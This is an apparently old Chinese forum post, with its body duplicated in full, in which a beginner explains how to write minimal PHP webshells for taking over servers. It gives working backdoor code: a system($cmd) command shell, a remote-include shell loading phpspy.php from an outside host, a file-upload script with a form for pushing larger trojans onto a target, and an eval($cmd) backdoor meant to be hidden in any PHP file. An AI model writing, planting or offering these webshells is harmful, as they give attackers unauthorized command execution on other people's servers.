本文没有什么特别之处,仅求抛砖引玉。并送给和我一样菜的在PHP门边徘徊的朋友。
刚学PHP没几天,我就急于功成,所以有错误及不足之处请大家积极指出。
PHP语法的强大是ASP望尘莫及的,仅一个:<? phpinfo();?>就可以刺探整个 服务 器的配置。运行cmd,上传文件等,都是非常简便的,现在用的好的PHP 木马 ,莫过于angel的phpspy了。昨天hak _ ban问怎么给PHP 木马 加密,我还没想到,但是对于写一个微型PHP 木马 ,我想还是很难被杀的。
这里简单探讨一下几个函数可以作为 木马 的使用:
1. 可以运行外部命令的几个函数:system,passthru,exec,shell _ exec,popen。
例:只要将<?system($cmd);?>等保存为cmd.php及可实现运行外部命令的功能。这几个函数可以说是最早的微行php 木马 了,所以一般虚拟主机的设置也会将这些函数屏蔽的。
2.还记得WDB 论坛 的style.php的 漏洞 吗?我们可以利用这个做个很难被杀的小 木马 。如下:
<?php include($include);?>
将其保存为1.php ,我们就可以调用其他不支持php 服务 器里的.php 木马 (如phpspy.php)来达到我们的目的: http://target.com/1.php ? Include=http://www.918x.com/phpspy.php
这里 http://www.918x.com 是不支持php的,否则将会在 http://www.918x.com 这台 服务 器运行phpspy.php,而不是目标 服务 器。
3. 这个还是angel在Discuz 2.2F的 攻击 中给我们的一个非常好的上传 木马 ,我没有改:
<?copy($ _ FILES[MyFile][tmp _ name],$ _ FILES[MyFile][name]);?>
将其保存为up.php后,在本地提交表单:
<form ENCTYPE="multipart/form-data" ACTION="http://目标 服务 器/up.php" METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="submit">
</form>
就可以把大个的php 木马 上传上去。
4. 我一直在想有没有同冰狐浪子的那个ASP一句话 木马 一样通过本地表单提交运行的PHP 木马 。终于找到了函数:eval,在PHP4中文参考手册上它的语法说明:
语法: void eval(string code _ str);
内容说明:本函数可将字符串之中的变量值代入,通常用在处理 数据库 的资料上。参数 code _ str 为欲处理的字符串。值的注意的是待处理的字符串要符合 PHP 的字符串格式,同时在结尾处要有分号。使用本函数处理后的字符串会沿续到 PHP 程序结束。
我们可以在目标主机上保存:<?eval($cmd);?>为一个PHP文件(我想也可以插在PHP任意文件里)。然后通过本地提交来达到目的,但与ASP不同的是,在magic _ quotes _ gpc = on的时候,过滤的很多的字符,使得这个使用功能大大的缩小。
对于这个PHP 木马 本地表单我做了很多次,还没有成熟的 代码 。还请高手指教。写好后会奉献给大家的。但是eval这个函数可以做微型PHP 木马 是无须质疑的。
Ps:写完后,有人告诉我,其实高手早就有微型的PHP 木马 了,只是没有公开。哎,我好郁闷啊, 研究 的都是人家早就有了的成果。不管怎么样,和大家分享一下我的 研究 ,希望能得到帮助和指教。
刚学PHP没几天,我就急于功成,所以有错误及不足之处请大家积极指出。
PHP语法的强大是ASP望尘莫及的,仅一个:<? phpinfo();?>就可以刺探整个 服务 器的配置。运行cmd,上传文件等,都是非常简便的,现在用的好的PHP 木马 ,莫过于angel的phpspy了。昨天hak _ ban问怎么给PHP 木马 加密,我还没想到,但是对于写一个微型PHP 木马 ,我想还是很难被杀的。
这里简单探讨一下几个函数可以作为 木马 的使用:
1. 可以运行外部命令的几个函数:system,passthru,exec,shell _ exec,popen。
例:只要将<?system($cmd);?>等保存为cmd.php及可实现运行外部命令的功能。这几个函数可以说是最早的微行php 木马 了,所以一般虚拟主机的设置也会将这些函数屏蔽的。
2.还记得WDB 论坛 的style.php的 漏洞 吗?我们可以利用这个做个很难被杀的小 木马 。如下:
<?php include($include);?>
将其保存为1.php ,我们就可以调用其他不支持php 服务 器里的.php 木马 (如phpspy.php)来达到我们的目的: http://target.com/1.php ? Include=http://www.918x.com/phpspy.php
这里 http://www.918x.com 是不支持php的,否则将会在 http://www.918x.com 这台 服务 器运行phpspy.php,而不是目标 服务 器。
3. 这个还是angel在Discuz 2.2F的 攻击 中给我们的一个非常好的上传 木马 ,我没有改:
<?copy($ _ FILES[MyFile][tmp _ name],$ _ FILES[MyFile][name]);?>
将其保存为up.php后,在本地提交表单:
<form ENCTYPE="multipart/form-data" ACTION="http://目标 服务 器/up.php" METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="submit">
</form>
就可以把大个的php 木马 上传上去。
4. 我一直在想有没有同冰狐浪子的那个ASP一句话 木马 一样通过本地表单提交运行的PHP 木马 。终于找到了函数:eval,在PHP4中文参考手册上它的语法说明:
语法: void eval(string code _ str);
内容说明:本函数可将字符串之中的变量值代入,通常用在处理 数据库 的资料上。参数 code _ str 为欲处理的字符串。值的注意的是待处理的字符串要符合 PHP 的字符串格式,同时在结尾处要有分号。使用本函数处理后的字符串会沿续到 PHP 程序结束。
我们可以在目标主机上保存:<?eval($cmd);?>为一个PHP文件(我想也可以插在PHP任意文件里)。然后通过本地提交来达到目的,但与ASP不同的是,在magic _ quotes _ gpc = on的时候,过滤的很多的字符,使得这个使用功能大大的缩小。
对于这个PHP 木马 本地表单我做了很多次,还没有成熟的 代码 。还请高手指教。写好后会奉献给大家的。但是eval这个函数可以做微型PHP 木马 是无须质疑的。
Ps:写完后,有人告诉我,其实高手早就有微型的PHP 木马 了,只是没有公开。哎,我好郁闷啊, 研究 的都是人家早就有了的成果。不管怎么样,和大家分享一下我的 研究 ,希望能得到帮助和指教。
扫一扫
2194
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
